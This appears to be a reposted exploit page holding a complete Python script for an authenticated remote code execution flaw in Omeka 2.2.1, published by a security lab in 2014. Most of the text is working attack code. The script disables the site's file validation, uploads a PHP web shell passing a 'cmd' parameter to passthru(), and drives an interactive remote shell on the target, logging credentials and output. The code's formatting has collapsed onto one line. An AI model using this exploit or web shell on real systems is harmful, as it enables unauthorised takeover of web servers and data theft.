Home / os / blackberry
Omeka 2.2.1 Remote Code Execution
Posted on 25 July 2014
#!/usr/bin/env python # # # Omeka 2.2.1 Remote Code Execution Exploit # # # Vendor: Omeka Team (CHNM GMU) # Product web page: http://www.omeka.org # Affected version: 2.2.1 and 2.2 # # Summary: Omeka is a free, flexible, and open source web-publishing # platform for the display of library, museum, archives, and scholarly # collections and exhibitions. Its 'five-minute setup' makes launching # an online exhibition as easy as launching a blog. # # Desc: Omeka suffers from an authenticated arbitrary PHP code execution. # The vulnerability is caused due to the improper verification of # uploaded files in '/admin/items/add' script thru the 'file[0]' POST # parameter. This can be exploited to execute arbitrary PHP code by # uploading a malicious PHP script file that will be stored in # '/files/original' directory after successfully disabling the file # validation option (or adding something like 'application/x-php' into the # allowed MIME types list) and bypassing the rewrite rule in the '.htaccess' # file with '.php5' extension. # # .htaccess fix by vendor: # ------------------------------------------------------- # Line 29: -RewriteRule !.php$ - [C] # Line 29: +RewriteRule !.(php[0-9]?|phtml|phps)$ - [C] # ------------------------------------------------------- # # - Role permission for disabling validation and uploading files: Super # - Role permission for uploading files: Super, Admin # # Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php # # Tested on: Kali Linux 3.7-trunk-686-pae # Apache/2.2.22 (Debian) # PHP 5.4.4-13(apache2handler) # MySQL 5.5.28 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Zero Science Lab - http://www.zeroscience.mk # Macedonian Information Security Research And Development Laboratory # # # Advisory ID: ZSL-2014-5194 # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php # # # 16.07.2014 # # version = '2.0.0.251' import itertools, mimetools, mimetypes import cookielib, urllib, urllib2, sys import logging, os, time, datetime, re from colorama import Fore, Back, Style, init from cStringIO import StringIO from urllib2 import URLError init() if os.name == 'posix': os.system('clear') if os.name == 'nt': os.system('cls') piton = os.path.basename(sys.argv[0]) def bannerche(): print ''' @---------------------------------------------------------------@ | | | Omeka 2.2.1 Remote Code Execution Exploit | | | | | | ID: ZSL-2014-5194 | | | | Copyleft (c) 2014, Zero Science Lab | | | @---------------------------------------------------------------@ ''' if len(sys.argv) < 3: print ' x20x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path> ' print 'x20x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka ' sys.exit() bannerche() print ' x20x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET host = sys.argv[1] path = sys.argv[2] cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) try: opener.open('http://'+host+'/'+path+'/admin/users/login') except urllib2.HTTPError, errorzio: if errorzio.code == 404: print 'x20x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print 'x20x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print 'x20x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print 'x20x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET print sys.exit() print 'x20x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET print 'x20x20[*] Login please.' username = raw_input('x20x20[*] Enter username: ') password = raw_input('x20x20[*] Enter password: ') login_data = urllib.urlencode({ 'username' : username, 'password' : password, 'remember' : '0', 'submit' : 'Log In' }) login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data) auth = login.read() for session in cj: sessid = session.name print 'x20x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET ses_chk = re.search(r'%s=w+' % sessid , str(cj)) cookie = ses_chk.group(0) print 'x20x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET if re.search(r'Login information incorrect. Please try again.', auth): print 'x20x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET print sys.exit() else: print 'x20x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET disable_file_validation = urllib.urlencode({ 'disable_default_file_validation' : '1', 'submit' : 'Save+Changes' }) opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation) print 'x20x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET class MultiPartForm(object): def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary def add_field(self, name, value): self.form_fields.append((name, value)) return def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return def __str__(self): parts = [] part_boundary = '--' + self.boundary parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields ) parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files ) flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return ' '.join(flattened) if __name__ == '__main__': form = MultiPartForm() form.add_field('public', '1') form.add_field('submit', 'Add Item') form.add_file('file[0]', 'thricerbd.php5', fileHandle=StringIO('<?php echo "<pre>"; passthru($_GET['cmd']); echo "</pre>"; ?>')) request = urllib2.Request('http://'+host+'/'+path+'/admin/items/add') request.add_header('User-agent', 'joxypoxy 2.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookie) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() print 'x20x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET checkitemid = urllib2.urlopen(request).read() itemid = re.search('The item #(d+)', checkitemid).group(1) print 'x20x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET print 'x20x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid) fileid = re.search('/admin/files/show/(d+)', checkfileid.read()).group(1) print 'x20x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET print 'x20x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET print 'x20x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid) hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1) print 'x20x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET print 'x20x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET print 'x20x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET time.sleep(1) furl = '/files/original/'+hashfile+'.php5' print today = datetime.date.today() fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log' logging.basicConfig(filename=fname,level=logging.DEBUG) logging.info(' '+'+'*75) logging.info(' +') logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')) logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit') logging.info(' + Python program executed: '+sys.argv[0]) logging.info(' + Version: '+version) logging.info(' + Full query: ''+piton+'x20'+host+'x20'+path+''') logging.info(' + Username input: '+username) logging.info(' + Password input: '+password) logging.info(' + Vector: '+'http://'+host+'/'+path+furl) logging.info(' +') logging.info(' + Advisory ID: ZSL-2014-5194') logging.info(' + Zero Science Lab - http://www.zeroscience.mk') logging.info(' +') logging.info(' '+'+'*75+' ') print Style.DIM+Fore.CYAN+'x20x20[*] Press [ ENTER ] to INSERT COIN! '+Style.RESET_ALL+Fore.RESET raw_input() while True: try: cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd)) reverse = execute.read() pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M) print Style.BRIGHT+Fore.CYAN cmdout = pattern.match(reverse) print cmdout.groups()[0].strip() print Style.RESET_ALL+Fore.RESET if cmd.strip() == 'exit': break logging.info('Command executed: '+cmd+' Output: '+'='*8+' '+cmdout.groups()[0].strip()+' '+'-'*60+' ') except Exception: break logging.warning(' Log ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+' END OF LOG') print 'x20x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET print 'x20x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET print sys.exit()
